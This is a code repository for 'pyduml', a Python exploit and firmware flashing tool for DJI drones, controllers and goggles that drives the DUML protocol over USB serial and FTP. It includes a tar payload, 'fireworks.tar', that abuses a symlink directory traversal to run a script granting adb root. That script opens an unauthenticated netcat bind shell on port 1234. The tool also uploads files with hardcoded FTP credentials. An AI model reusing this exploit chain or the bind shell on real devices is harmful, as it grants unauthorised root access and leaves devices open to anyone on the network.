├── README.md
├── fireworks.tar
├── history.jpg
├── pyduml.py
├── table_crc.py
└── utils.py


/README.md:
--------------------------------------------------------------------------------
 1 | Pyduml
 2 | ------
 3 | Python based DUML [DJI Universal Markup Language] Exploit & FW upgrade/downgrade tool.
 4 | 
 5 | Thanks to the following:
 6 | @POV @hostile, @the_lord, @hfman, @jayemdee
 7 | 
 8 | ----------------------------------------------------------------
 9 | Dependencies:
10 | 
11 | - python 2.7 (not sure if 3+ has been tested yet)
12 | 
13 | - pyserial 3.3 package (install with 'pip install pyserial' and then follow that with 'pip install --upgrade pyserial' to be sure you are on newest version)
14 | 
15 | - pathlib 1.0.1 (install with 'pip install pathlib')
16 | 
17 | ----------------------------------------------------------------
18 | Normal Usage: python pyduml.py
19 | This will autodetect your device and communications port and setup the RNDIS network for ftp file transfer under linux.  
20 | If something doesnt work right with this you can use the advanced usage instructions below. 
21 | 
22 | ----------------------------------------------------------------
23 | Advanced Usage: python pyduml.py serial_port debugmode(optional)
24 | 
25 | Serial Port should resemble '/dev/cu.usbmodemXXXX' on Apple 
26 | or on Linux should be something like '/dev/ttyACM0'where XXXX 
27 | is your specific device number connected
28 | 
29 | ----------------------------------------------------------------
30 | 
31 | Use included RedHerring fireworks.tar to obtain root (DUMLHerring aka Dumb Herring).  Just rename it to dji_system.bin.
32 | Run in standalone mode for use as a firmware upgrade / downgrade tool firmware bins here: [dji_system.bin](https://github.com/MAVProxyUser/dji_system.bin)
33 | 
34 | 
35 | ![HDnes](http://piq.codeus.net/static/media/userpics/piq_291737_400x400.png)
36 | 
37 | ![Mutated Herrings have hit the seas...](https://raw.githubusercontent.com/hdnes/pyduml/master/history.jpg)
38 | 
39 | ### #DeejayeyeHackingClub information repos aka "The OG's" (Original Gangsters)
40 | 
41 | http://dji.retroroms.info/ - "Wiki"
42 | 
43 | https://github.com/fvantienen/dji_rev - This repository contains tools for reverse engineering DJI product firmware images.
44 | 
45 | https://github.com/Bin4ry/deejayeye-modder - APK "tweaks" for settings & "mods" for additional / altered functionality
46 | 
47 | https://github.com/hdnes/pyduml - Assistant-less firmware pushes and DUMLHacks referred to as DUMBHerring when used with "fireworks.tar" from RedHerring. DJI silently changes Assistant? great... we will just stop using it.
48 | 
49 | https://github.com/MAVProxyUser/P0VsRedHerring - RedHerring, aka "July 4th Independence Day exploit", "FTPD directory transversal 0day", etc. (Requires Assistant). We all needed a public root exploit... why not burn some 0day?
50 | 
51 | https://github.com/MAVProxyUser/dji_system.bin - Current Archive of dji_system.bin files that compose firmware updates referenced by MD5 sum. These can be used to upgrade and downgrade, and root your I2, P4, Mavic, Spark, Goggles, and Mavic RC to your hearts content. (Use with pyduml or DUMLDore)
52 | 
53 | https://github.com/MAVProxyUser/firm_cache - Extracted contents of dji_system.bin, in the future will be used to mix and match pieces of firmware for custom upgrade files. This repo was previously private... it is now open.
54 | 
55 | https://github.com/MAVProxyUser/DUMLrub - Ruby port of PyDUML, and firmware cherry picking tool. Allows rolling of custom firmware images.
56 | 
57 | https://github.com/jezzab/DUMLdore - Even windows users need some love, so DUMLDore was created to help archive, and flash dji_system.bin files on windows platforms.
58 | 
59 | https://github.com/MAVProxyUser/DJI_ftpd_aes_unscramble - DJI has modified the GPL Busybox ftpd on Mavic, Spark, & Inspire 2 to include AES scrambling of downloaded files... this tool will reverse the scrambling
60 | 


--------------------------------------------------------------------------------
/fireworks.tar:
--------------------------------------------------------------------------------
 1 | Burning0day.txt                                                                                     000644  000000  000024  00000000045 13132747436 014116  0                                                                                                    ustar 00root                            staff                           000000  000000                                                                                                                                                                         get root... Thx for all the fish P0V
 2 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            symlink                                                                                             000755  000000  000024  00000000000 13132747436 014337  2/data/.bin                                                                                          ustar 00root                            staff                           000000  000000                                                                                                                                                                         symlink/grep                                                                                        000755  000000  000024  00000001073 13132747436 013546  0                                                                                                    ustar 00root                            staff                           000000  000000                                                                                                                                                                         /system/xbin/busybox touch /tmp/RedHerring.$$
 3 | /system/xbin/busybox touch /data/InYourGrill.$$
 4 | rm -rf /data/.bin/grep 
 5 | 
 6 | echo -n RedHerringHasFangs > /sys/class/android_usb/android0/iSerial
 7 | setprop service.adb.root 1
 8 | setprop service.adb.tcp.port -1
 9 | setprop sys.usb.config rndis,mass_storage,bulk,acm,adb
10 | busybox devmem 0xe10093d0 8 0x40    #enable uart
11 | sleep 1
12 | # fuck!!!! work already! 
13 | adb_en.sh NonSecurePrivilege 
14 | stop adbd 
15 | start adbd
16 | 
17 | #while true; do /system/xbin/busybox nc -l -p 1234 -e /system/bin/sh & done 
18 | /system/xbin/busybox nc -l -p 1234 -e /system/bin/sh
19 | 
20 | 
21 | 
22 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


--------------------------------------------------------------------------------
/history.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hdnes/pyduml/3e092904bfd6902b313d00861a164364fe3fbd0d/history.jpg


--------------------------------------------------------------------------------
/pyduml.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | # HDnes pythonDUML
  4 | # Thanks Hostile for the fireworks grepping all the fish.
  5 | # Thanks the_lord for the sniffing
  6 | # Thanks hfman & jayemdee for the usb and ftp work
  7 | # Ugly SparkRC stuff from jan2642,bin4ry and the_lord
  8 | 
  9 | import time
 10 | import os
 11 | import platform
 12 | import sys
 13 | import serial
 14 | import struct
 15 | import hashlib
 16 | import socket
 17 | 
 18 | from table_crc import *
 19 | from utils import *
 20 | from pathlib import Path
 21 | from ftplib import FTP
 22 | from serial.tools import list_ports
 23 | 
 24 | def main():
 25 |     platform_detection() 
 26 |     device_selection_prompt()
 27 |     if device != 4:
 28 |         configure_usbserial()
 29 |         check_network()
 30 |     elif device == 4:
 31 |         configure_socket()
 32 |     define_firmware()
 33 |     if device != 4:
 34 |         generate_update_packets()
 35 |         write_packet(packet_1) # Enter upgrade mode (delete old file if exists) 
 36 |         write_packet(packet_2) # Enable Reporting
 37 |         upload_binary()
 38 |         write_packet(packet_3) # Send File size
 39 |         write_packet(packet_4) # Send MD5 Hash for verification and Start Upgrade
 40 |     elif device == 4:
 41 |         doSparkRc()
 42 |     print ("--------------------------------------------------------------------------") 
 43 |     print ("If you are upgrading/downgrading firmware, this may take a while.\nIf you are rooting, the process is almost instant. wait a few seconds and reboot your device.")
 44 |     if device != 4:
 45 |         ser.close
 46 |     elif device == 4:
 47 |         s.close()
 48 |     return
 49 | 
 50 | def platform_detection():
 51 |     global sysOS
 52 |     sysOS = platform.system()
 53 |     print("\033c") # clear screen
 54 |     return sysOS
 55 | 
 56 | def device_selection_prompt():
 57 | 	global device
 58 | 	device = input('\nSelect device number as follows: Aircraft = [1], RC = [2], Goggles = [3], SparkRC = [4]: ')
 59 | 	if device == 1:
 60 | 	    print ("Exploit for Aircraft selected")
 61 | 	elif device == 2:
 62 | 	    print ("Exploit for RC selected")
 63 | 	    print ("----------------------")
 64 | 	    print ("Rooting RC is finicky, if having difficulties try the following")
 65 | 	    print ("--------------------------------------------------------------------------")
 66 | 	    print ("after root completes:")
 67 | 	    print ("1: unplug before turning off")
 68 | 	    print ("2: turn off")
 69 | 	    print ("3: turn on (without usb connected)")
 70 | 	    print ("4: turn off")
 71 | 	    print ("5: plug in usb and turn on")
 72 | 
 73 | 	elif device == 3:
 74 | 	    print ("Exploit for Goggles selected")	
 75 | 
 76 | 	elif device == 4:
 77 | 		print("Spark RC selected")
 78 | 	print ("--------------------------------------------------------------------------")    
 79 | 	return
 80 | 
 81 | def find_port():
 82 |     try:
 83 |         dji_dev = list(list_ports.grep("2ca3:001f"))[0][0]
 84 |         return dji_dev
 85 |     except:
 86 |         sys.exit("Error: No DJI device found plugged to your system. Please re-plug / reboot device and try again.\n")
 87 | 
 88 | def check_network():
 89 |     # Linux specific magic
 90 |     if sysOS == 'Linux':
 91 |         print("Attempting to to set IP on usb0...")
 92 |         set_ip_addr('usb0', '192.168.42.1')
 93 |         try:
 94 |             iface_exists("usb0")
 95 |             os.system('/sbin/ifconfig usb0 up') # linux specific hack: cant find a pure python way of bringing usb0 up after config
 96 |             print("Network setup successful.")
 97 |         except:
 98 |             sys.exit("Error: Unknown failure configuring RNDIS device.")
 99 |     return
100 | 
101 | def configure_usbserial():
102 |     global comport
103 | 
104 |     # no command line args
105 |     if len(sys.argv) < 2:
106 |         comport = find_port()
107 |         print ("Preparing to run pythonDUML exploit from a " + sysOS + " Machine using com port: " +comport)
108 |         print ("If this is not the right device you can override by passing the device name as first argument to this script.\n")
109 |     # parse command line args
110 |     else:
111 |         comport = sys.argv[1]
112 |         print ("Preparing to run pythonDUML exploit from a " + sysOS + " Machine using com port: " +comport+ "\n")
113 |     try:
114 |         global ser
115 |         ser = serial.Serial(comport)
116 |         ser.baudrate = 115200
117 |     except:
118 |         print("Error: Could not open communications port " + comport + ".\n")
119 |         sys.exit(0)
120 |     return
121 | 
122 | def configure_socket():
123 | 	global s
124 | 	TCP_IP = '192.168.1.1'
125 | 	TCP_PORT = 19003
126 | 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
127 | 	s.connect((TCP_IP, TCP_PORT))
128 | 
129 | def write_packet(data):
130 |     ser.write(data)     # write a string
131 |     time.sleep(0.1)
132 |     hexout = ' '.join(format(x, '02X') for x in data)
133 |     if len(sys.argv) > 2 and sys.argv[2] == "debugmode":
134 |         print (hexout)
135 |     else:
136 |         print("Sent DUML packet...\n")
137 |     return
138 | 
139 | def send_duml_tcp(socket, source, target, cmd_type, cmd_set, cmd_id, payload = None):
140 |     global sequence_number
141 |     sequence_number = 0x34eb
142 |     packet = bytearray.fromhex(u'55')
143 |     length = 13
144 |     if payload is not None:
145 |         length = length + len(payload)
146 | 
147 |     if length > 0x3ff:
148 |         print("Packet too large")
149 |         exit(1)
150 | 
151 |     packet += struct.pack('B', length & 0xff)
152 |     packet += struct.pack('B', (length >> 8) | 0x4) # MSB of length and protocol version
153 |     hdr_crc = calc_pkt55_hdr_checksum(0x77, packet, 3)
154 |     packet += struct.pack('B', hdr_crc)
155 |     packet += struct.pack('B', source)
156 |     packet += struct.pack('B', target)
157 |     packet += struct.pack('<H', sequence_number)
158 |     packet += struct.pack('B', cmd_type)
159 |     packet += struct.pack('B', cmd_set)
160 |     packet += struct.pack('B', cmd_id)
161 | 
162 |     if payload is not None:
163 |         packet += payload
164 | 
165 |     crc = calc_checksum(packet, len(packet))
166 |     packet += struct.pack('<H',crc)
167 |     socket.send(packet)
168 |     if len(sys.argv) > 2 and sys.argv[2] == "debugmode":
169 |         print(' '.join(format(x, '02x') for x in packet))
170 |     else:
171 |         print("Sent DUML packet...\n")
172 | 
173 |     sequence_number += 1
174 | 
175 | def define_firmware():
176 |     global firmware_file
177 |     if device != 4:
178 |         firmware_file = Path("dji_system.bin").absolute()
179 |     elif device == 4:
180 |         firmware_file = Path("fw.tar").absolute()
181 |     if firmware_file.is_file() is False:
182 |         sys.exit("Error: No dji_system.bin or fw.tar found in CWD or it is not a valid file.\n")
183 |     return
184 | 
185 | def upload_binary():
186 |     print("Opening FTP connection to 192.168.42.2...\n")
187 |     ftp = FTP("192.168.42.2", "Gimme", "DatROot!")
188 |     fh = open(str(firmware_file), 'rb')
189 |     ftp.set_pasv(True)	# this is the fix for buggy ftp uploads we ran into in early days -jayemdee
190 |     ftp.storbinary('STOR /upgrade/dji_system.bin', fh)
191 |     print (str(firmware_file) + " uploaded to FTP with a remote file size of: " + str(ftp.size("/upgrade/dji_system.bin")))
192 |     ftp.cwd('upgrade')
193 |     if '.bin' in ftp.nlst() :
194 |         print(".bin directory already exists. Skipping directory creation...\n")
195 |     else :
196 |         print("Creating /upgrade/.bin directory...\n")
197 |         ftp.mkd("/upgrade/.bin")
198 | 	
199 |     fh.close()
200 |     ftp.quit()        
201 |     return
202 | 
203 | def generate_update_packets():
204 |     
205 |     global packet_1 
206 |     global packet_2 
207 |     global packet_3 
208 |     global packet_4
209 | 
210 |     # Pack file size into 4 byte Long little endian
211 |     dir_path = str(firmware_file)
212 |     file_size = struct.pack('<L',int(os.path.getsize(dir_path)))
213 | 
214 |     if device == 1: #Aircraft
215 |         # Enter upgrade mode (delete old file if exists)
216 |         packet_1 = bytearray.fromhex(u'55 16 04 FC 2A 28 65 57 40 00 07 00 00 00 00 00 00 00 00 00 27 D3')
217 |         # Enable Reporting
218 |         packet_2 = bytearray.fromhex(u'55 0E 04 66 2A 28 68 57 40 00 0C 00 88 20')
219 | 
220 |         # 551A04B12A286B5740000800YYYYYYYY0000000000000204XXXX
221 |         #YYYYYYYY - file size in little endian
222 |         #XXXX - CRC as produced by table_crc.py
223 | 
224 |         packet_3 = bytearray.fromhex(u'55 1A 04 B1 2A 28 6B 57 40 00 08 00')
225 |         packet_3 += file_size #append file size
226 |         packet_3 += bytearray.fromhex(u'00 00 00 00 00 00 02 04')
227 | 
228 |         packet_length = len(packet_3)
229 |         crc = calc_checksum(packet_3,packet_length)
230 |         crc = struct.pack('<H',crc)
231 |         packet_3 += crc
232 | 
233 |         # Calculate File md5 hash
234 |         filehash = hashlib.md5()
235 |         filehash.update(open(dir_path).read())
236 |         filehash = filehash.hexdigest()
237 |         hex_data = filehash.decode("hex")
238 |         md5_check = bytearray(hex_data)
239 | 
240 |         # File Verification and Start Upgrade
241 |         packet_4 = bytearray.fromhex(u'55 1E 04 8A 2A 28 F6 57 40 00 0A 00')
242 |         packet_4 += md5_check
243 | 
244 |         packet_length = len(packet_4)
245 |         crc = calc_checksum(packet_4,packet_length)
246 |         crc = struct.pack('<H',crc)
247 |         packet_4 += crc
248 |     
249 |     elif device == 2: #RC
250 |         # Enter upgrade mode (delete old file if exists)
251 |         packet_1 = bytearray.fromhex(u'55 16 04 FC 2A 2D E7 27 40 00 07 00 00 00 00 00 00 00 00 00 9F 44')
252 |         # Enable Reporting
253 |         packet_2 = bytearray.fromhex(u'55 0E 04 66 2A 2D EA 27 40 00 0C 00 2C C8')
254 | 
255 |         packet_3 = bytearray.fromhex(u'55 1A 04 B1 2A 2D EC 27 40 00 08 00')
256 |         packet_3 += file_size #append file size
257 |         packet_3 += bytearray.fromhex(u'00 00 00 00 00 00 02 04')
258 | 
259 |         packet_length = len(packet_3)
260 |         crc = calc_checksum(packet_3,packet_length)
261 |         crc = struct.pack('<H',crc)
262 |         packet_3 += crc
263 | 
264 |         # Calculate File md5 hash
265 |         filehash = hashlib.md5()
266 |         filehash.update(open(dir_path).read())
267 |         filehash = filehash.hexdigest()
268 |         hex_data = filehash.decode("hex")
269 |         md5_check = bytearray(hex_data)
270 | 
271 |         # File Verification and Start Upgrade
272 |         packet_4 = bytearray.fromhex(u'55 1E 04 8A 2A 2D 02 28 40 00 0A 00')
273 |         packet_4 += md5_check
274 | 
275 |         packet_length = len(packet_4)
276 |         crc = calc_checksum(packet_4,packet_length)
277 |         crc = struct.pack('<H',crc)
278 |         packet_4 += crc
279 | 
280 |     elif device == 3: #Goggles
281 |         # Enter upgrade mode (delete old file if exists)
282 |         packet_1 = bytearray.fromhex(u'55 16 04 FC 2A 3C F7 35 40 00 07 00 00 00 00 00 00 00 00 00 0C 29')
283 |         # Enable Reporting
284 |         packet_2 = bytearray.fromhex(u'55 0E 04 66 2A 3C FA 35 40 00 0C 00 48 02')
285 | 
286 |         packet_3 = bytearray.fromhex(u'55 1A 04 B1 2A 3C FD 35 40 00 08 00')
287 |         packet_3 += file_size #append file size
288 |         packet_3 += bytearray.fromhex(u'00 00 00 00 00 00 02 04')
289 | 
290 |         packet_length = len(packet_3)
291 |         crc = calc_checksum(packet_3,packet_length)
292 |         crc = struct.pack('<H',crc)
293 |         packet_3 += crc
294 | 
295 |         # Calculate File md5 hash
296 |         filehash = hashlib.md5()
297 |         filehash.update(open(dir_path).read())
298 |         filehash = filehash.hexdigest()
299 |         hex_data = filehash.decode("hex")
300 |         md5_check = bytearray(hex_data)
301 | 
302 |         # File Verification and Start Upgrade
303 |         packet_4 = bytearray.fromhex(u'55 1E 04 8A 2A 3C 5B 36 40 00 0A 00')
304 |         packet_4 += md5_check
305 | 
306 |         packet_length = len(packet_4)
307 |         crc = calc_checksum(packet_4,packet_length)
308 |         crc = struct.pack('<H',crc)
309 |         packet_4 += crc
310 | 		
311 |     else:
312 |         sys.exit("Invalid Selection. Exiting.\n")
313 | 
314 |     return
315 | 
316 | def doSparkRc():
317 |     f = open (str(firmware_file), "rb")
318 |     data = f.read()
319 |     f.close()
320 |     
321 |     send_duml_tcp(s, 0x02, 0x1b, 0x40, 0x00, 0x07, bytearray.fromhex(u'00 00 00 00 00 00 00 00 00'))
322 | 
323 |     packet_08 = bytearray.fromhex(u'00')
324 |     packet_08 += struct.pack('<I', len(data))
325 |     packet_08 += bytearray.fromhex(u'00 00 00 00 00 00 01 04')
326 |     send_duml_tcp(s, 0x02, 0x1b, 0x40, 0x00, 0x08, packet_08)
327 | 
328 |     for i in range(0, int(len(data)//1000)):
329 |         packet_09 = bytearray.fromhex(u'00')
330 |         packet_09 += struct.pack('<I', i)
331 |         packet_09 += struct.pack('<H', 1000)
332 |         packet_09 += data[i * 1000:(i + 1) * 1000]
333 |         send_duml_tcp(s, 0x02, 0x1b, 0x00, 0x00, 0x09, packet_09)
334 | 
335 |     i += 1
336 |     remain = len(data) % 1000
337 |     packet_09 = bytearray.fromhex(u'00')
338 |     packet_09 += struct.pack('<I', i)
339 |     packet_09 += struct.pack('<H', remain)
340 |     packet_09 += data[i * 1000:]
341 |     send_duml_tcp(s, 0x02, 0x1b, 0x00, 0x00, 0x09, packet_09)
342 | 
343 |     filehash = hashlib.md5()
344 |     filehash.update(data)
345 |     filehash = filehash.digest()
346 |     packet_0a = bytearray.fromhex(u'00')
347 |     packet_0a += filehash
348 |     send_duml_tcp(s, 0x02, 0x1b, 0x40, 0x00, 0x0a, packet_0a)
349 | 
350 | # from comm_serial2pcap.py
351 | # https://github.com/mefistotelis/phantom-firmware-tools/issues/25#issuecomment-306052129
352 | def calc_pkt55_hdr_checksum(seed, packet, plength):
353 |     arr_2A103 = [0x00,0x5E,0xBC,0xE2,0x61,0x3F,0xDD,0x83,0xC2,0x9C,0x7E,0x20,0xA3,0xFD,0x1F,0x41,
354 |         0x9D,0xC3,0x21,0x7F,0xFC,0xA2,0x40,0x1E,0x5F,0x01,0xE3,0xBD,0x3E,0x60,0x82,0xDC,
355 |         0x23,0x7D,0x9F,0xC1,0x42,0x1C,0xFE,0xA0,0xE1,0xBF,0x5D,0x03,0x80,0xDE,0x3C,0x62,
356 |         0xBE,0xE0,0x02,0x5C,0xDF,0x81,0x63,0x3D,0x7C,0x22,0xC0,0x9E,0x1D,0x43,0xA1,0xFF,
357 |         0x46,0x18,0xFA,0xA4,0x27,0x79,0x9B,0xC5,0x84,0xDA,0x38,0x66,0xE5,0xBB,0x59,0x07,
358 |         0xDB,0x85,0x67,0x39,0xBA,0xE4,0x06,0x58,0x19,0x47,0xA5,0xFB,0x78,0x26,0xC4,0x9A,
359 |         0x65,0x3B,0xD9,0x87,0x04,0x5A,0xB8,0xE6,0xA7,0xF9,0x1B,0x45,0xC6,0x98,0x7A,0x24,
360 |         0xF8,0xA6,0x44,0x1A,0x99,0xC7,0x25,0x7B,0x3A,0x64,0x86,0xD8,0x5B,0x05,0xE7,0xB9,
361 |         0x8C,0xD2,0x30,0x6E,0xED,0xB3,0x51,0x0F,0x4E,0x10,0xF2,0xAC,0x2F,0x71,0x93,0xCD,
362 |         0x11,0x4F,0xAD,0xF3,0x70,0x2E,0xCC,0x92,0xD3,0x8D,0x6F,0x31,0xB2,0xEC,0x0E,0x50,
363 |         0xAF,0xF1,0x13,0x4D,0xCE,0x90,0x72,0x2C,0x6D,0x33,0xD1,0x8F,0x0C,0x52,0xB0,0xEE,
364 |         0x32,0x6C,0x8E,0xD0,0x53,0x0D,0xEF,0xB1,0xF0,0xAE,0x4C,0x12,0x91,0xCF,0x2D,0x73,
365 |         0xCA,0x94,0x76,0x28,0xAB,0xF5,0x17,0x49,0x08,0x56,0xB4,0xEA,0x69,0x37,0xD5,0x8B,
366 |         0x57,0x09,0xEB,0xB5,0x36,0x68,0x8A,0xD4,0x95,0xCB,0x29,0x77,0xF4,0xAA,0x48,0x16,
367 |         0xE9,0xB7,0x55,0x0B,0x88,0xD6,0x34,0x6A,0x2B,0x75,0x97,0xC9,0x4A,0x14,0xF6,0xA8,
368 |         0x74,0x2A,0xC8,0x96,0x15,0x4B,0xA9,0xF7,0xB6,0xE8,0x0A,0x54,0xD7,0x89,0x6B,0x35]
369 | 
370 |     chksum = seed
371 |     for i in range(0, plength):
372 |         chksum = arr_2A103[((packet[i] ^ chksum) & 0xFF)];
373 |     return chksum	
374 | 	
375 | if __name__ == "__main__":
376 |     main()
377 | 


--------------------------------------------------------------------------------
/table_crc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # https://github.com/mefistotelis/phantom-firmware-tools/issues/25
 3 | # as shared by GlovePuppet
 4 | 
 5 | import struct
 6 | 
 7 | 
 8 | def calc_checksum(packet, plength):
 9 | 
10 |     crc = [0x0000, 0x1189, 0x2312, 0x329b, 0x4624, 0x57ad, 0x6536, 0x74bf,
11 |     0x8c48, 0x9dc1, 0xaf5a, 0xbed3, 0xca6c, 0xdbe5, 0xe97e, 0xf8f7,
12 |     0x1081, 0x0108, 0x3393, 0x221a, 0x56a5, 0x472c, 0x75b7, 0x643e,
13 |     0x9cc9, 0x8d40, 0xbfdb, 0xae52, 0xdaed, 0xcb64, 0xf9ff, 0xe876,
14 |     0x2102, 0x308b, 0x0210, 0x1399, 0x6726, 0x76af, 0x4434, 0x55bd,
15 |     0xad4a, 0xbcc3, 0x8e58, 0x9fd1, 0xeb6e, 0xfae7, 0xc87c, 0xd9f5,
16 |     0x3183, 0x200a, 0x1291, 0x0318, 0x77a7, 0x662e, 0x54b5, 0x453c,
17 |     0xbdcb, 0xac42, 0x9ed9, 0x8f50, 0xfbef, 0xea66, 0xd8fd, 0xc974,
18 |     0x4204, 0x538d, 0x6116, 0x709f, 0x0420, 0x15a9, 0x2732, 0x36bb,
19 |     0xce4c, 0xdfc5, 0xed5e, 0xfcd7, 0x8868, 0x99e1, 0xab7a, 0xbaf3,
20 |     0x5285, 0x430c, 0x7197, 0x601e, 0x14a1, 0x0528, 0x37b3, 0x263a,
21 |     0xdecd, 0xcf44, 0xfddf, 0xec56, 0x98e9, 0x8960, 0xbbfb, 0xaa72,
22 |     0x6306, 0x728f, 0x4014, 0x519d, 0x2522, 0x34ab, 0x0630, 0x17b9,
23 |     0xef4e, 0xfec7, 0xcc5c, 0xddd5, 0xa96a, 0xb8e3, 0x8a78, 0x9bf1,
24 |     0x7387, 0x620e, 0x5095, 0x411c, 0x35a3, 0x242a, 0x16b1, 0x0738,
25 |     0xffcf, 0xee46, 0xdcdd, 0xcd54, 0xb9eb, 0xa862, 0x9af9, 0x8b70,
26 |     0x8408, 0x9581, 0xa71a, 0xb693, 0xc22c, 0xd3a5, 0xe13e, 0xf0b7,
27 |     0x0840, 0x19c9, 0x2b52, 0x3adb, 0x4e64, 0x5fed, 0x6d76, 0x7cff,
28 |     0x9489, 0x8500, 0xb79b, 0xa612, 0xd2ad, 0xc324, 0xf1bf, 0xe036,
29 |     0x18c1, 0x0948, 0x3bd3, 0x2a5a, 0x5ee5, 0x4f6c, 0x7df7, 0x6c7e,
30 |     0xa50a, 0xb483, 0x8618, 0x9791, 0xe32e, 0xf2a7, 0xc03c, 0xd1b5,
31 |     0x2942, 0x38cb, 0x0a50, 0x1bd9, 0x6f66, 0x7eef, 0x4c74, 0x5dfd,
32 |     0xb58b, 0xa402, 0x9699, 0x8710, 0xf3af, 0xe226, 0xd0bd, 0xc134,
33 |     0x39c3, 0x284a, 0x1ad1, 0x0b58, 0x7fe7, 0x6e6e, 0x5cf5, 0x4d7c,
34 |     0xc60c, 0xd785, 0xe51e, 0xf497, 0x8028, 0x91a1, 0xa33a, 0xb2b3,
35 |     0x4a44, 0x5bcd, 0x6956, 0x78df, 0x0c60, 0x1de9, 0x2f72, 0x3efb,
36 |     0xd68d, 0xc704, 0xf59f, 0xe416, 0x90a9, 0x8120, 0xb3bb, 0xa232,
37 |     0x5ac5, 0x4b4c, 0x79d7, 0x685e, 0x1ce1, 0x0d68, 0x3ff3, 0x2e7a,
38 |     0xe70e, 0xf687, 0xc41c, 0xd595, 0xa12a, 0xb0a3, 0x8238, 0x93b1,
39 |     0x6b46, 0x7acf, 0x4854, 0x59dd, 0x2d62, 0x3ceb, 0x0e70, 0x1ff9,
40 |     0xf78f, 0xe606, 0xd49d, 0xc514, 0xb1ab, 0xa022, 0x92b9, 0x8330,
41 |     0x7bc7, 0x6a4e, 0x58d5, 0x495c, 0x3de3, 0x2c6a, 0x1ef1, 0x0f78]
42 | 
43 |     # Seeds
44 |     # v = 0x1012 #Naza M
45 |     # v = 0x1013 #Phantom 2
46 |     # v = 0x7000 #Naza M V2
47 |     v = 0x3692  #P3/P4/Mavic 
48 | 
49 |     for i in range(0, plength):
50 |         vv = v >> 8
51 |         v = vv ^ crc[((packet[i] ^ v) & 0xFF)]
52 |     return v
53 | 
54 | 
55 | 
56 | 
57 | 
58 | 


--------------------------------------------------------------------------------
/utils.py:
--------------------------------------------------------------------------------
 1 | import sys, socket, struct, fcntl
 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 3 | sockfd = sock.fileno()
 4 | SIOCGIFADDR = 0x8915
 5 | SIOCSIFADDR = 0x8916
 6 | 
 7 | def iface_exists(iface):
 8 |     ifreq = struct.pack('16sH14s', iface, socket.AF_INET, '\x00'*14)
 9 |     try:
10 |         res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
11 |     except:
12 |         sys.exit("Error: "+iface+" device not found.")
13 |         #ip = struct.unpack('16sH2x4s8x', res)[2]
14 |     return True
15 | 
16 | def set_ip_addr(iface, ip):
17 |     try:
18 |         bin_ip = socket.inet_aton(ip)
19 |         ifreq = struct.pack('16sH2s4s8s', iface, socket.AF_INET, '\x00'*2, bin_ip, '\x00'*8)
20 |         fcntl.ioctl(sock, SIOCSIFADDR, ifreq)
21 |     except:
22 |         sys.exit("Error setting " +ip+ " to " +iface+ ". Is your DJI device connected?\n")
23 |     return True
24 | 


--------------------------------------------------------------------------------